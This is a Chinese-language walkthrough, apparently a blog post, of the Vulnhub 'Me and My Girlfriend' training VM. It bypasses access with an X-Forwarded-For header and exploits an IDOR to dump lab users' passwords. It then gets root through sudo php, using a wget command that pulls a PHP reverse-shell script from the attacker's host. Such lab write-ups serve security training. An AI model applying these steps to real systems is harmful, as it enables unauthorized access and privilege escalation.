Vulnhub-Me and My Girlfriend: 1-Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址:

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

靶机知识点:

  • nmap
  • dirb
  • sudo

kali ip:192.168.34.80
靶机ip:192.168.34.152

信息收集

常规收集。

nmap -sV -p- 192.168.34.152

在这里插入图片描述
妥妥的web。
访问80,
在这里插入图片描述
提示只能是本地访问,直接想到了xff头。先收集信息。扫下目录。

dirb http://192.168.34.152/

在这里插入图片描述

漏洞利用

这里就准备修改头了,使用bp抓包,增加x-forwarded-for:127.0.0.1。最恶心的是,后面的每个页面都得加。原地360度爆炸。
在这里插入图片描述
成功的访问到了。
在这里插入图片描述
看见注册页面,先注册个账号,抓包增加x-forwarded-for:127.0.0.1

在这里插入图片描述
在这里插入图片描述
相信这里都以为有伪协议。这是坑

我注册账号的为admin:admin。一定要记得每次要增加xff头

在这里插入图片描述
在这里插入图片描述
进来之后,啥玩意都没有。就一个profile。瞅瞅。

在这里插入图片描述
发现好像可以修改账号和密码,实测没毛用,但我看见url里有用户的id。

我尝试修改用户id得到不同用户的信息。实测能行

抓包,修改为1
在这里插入图片描述
在这里插入图片描述
成功的得到了用户id为1的信息。

密码看不见咋办?f12就看见了

在这里插入图片描述
我依次改变id,发现了五个用户

id=1
    <input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
    <input type="text" name="username" id="username" value="eweuhtandingan"><br>
    <input type="password" name="password" id="password" value="skuyatuh"><br>


id=2
    <input type="text" name="name" id="name" value="Aing Maung"><br>
    <input type="text" name="username" id="username" value="aingmaung"><br>
    <input type="password" name="password" id="password" value="qwerty!!!"><br>

id=3
    <input type="text" name="name" id="name" value="Sunda Tea"><br>
    <input type="text" name="username" id="username" value="sundatea"><br>
    <input type="password" name="password" id="password" value="indONEsia"><br>

id=4
    <input type="text" name="name" id="name" value="Sedih Aing Mah"><br>
    <input type="text" name="username" id="username" value="sedihaingmah"><br>
    <input type="password" name="password" id="password" value="cedihhihihi"><br>

id=5
    <input type="text" name="name" id="name" value="Alice Geulis"><br>
    <input type="text" name="username" id="username" value="alice"><br>
    <input type="password" name="password" id="password" value="4lic3"><br>

这里我卡了一段时间,才想起ssh连接。账号和密码可能就是linux用户的账号和密码。其实根据这个靶机的情景提示,也能看出来

Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!

在这里插入图片描述

权限提升

看下这个用户能sudo什么命令

sudo -l 

在这里插入图片描述
竟然能用root执行php命令。

瞬间就想到了php反弹shell。我用的kali中的脚本php-reverse-shell.php,python3搭建简易服务器

在这里插入图片描述
cd到tmp目录下,下载到本地

wget http://192.168.34.80:8888/php-reverse-shell.php

在这里插入图片描述
修改这个文件。
在这里插入图片描述
kali监听1234端口
在这里插入图片描述

Rooted !!

在这里插入图片描述

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vicl1fe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值